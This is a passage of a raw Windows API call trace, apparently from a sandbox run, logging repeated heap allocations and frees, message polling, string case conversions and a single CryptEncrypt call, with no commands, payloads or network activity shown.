[0266.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.344] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.346] CharLowerBuffW (in: lpsz="byte[17648]", cchLength=0xb | out: lpsz="byte[17648]") returned 0xb [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0266.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0266.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.349] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.349] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.349] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.350] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.350] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.350] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0266.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.351] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b7a48*, pdwDataLen=0x8bef68*=0x44ea, dwBufLen=0x44f0 | out: pbData=0x24b7a48*, pdwDataLen=0x8bef68*=0x44f0) returned 1 [0266.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0266.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0266.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0266.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0266.354] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.354] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.355] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.355] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.356] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.356] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.357] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.357] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.357] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.357] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.357] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.357] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.357] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.358] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.358] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.360] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.360] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.360] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 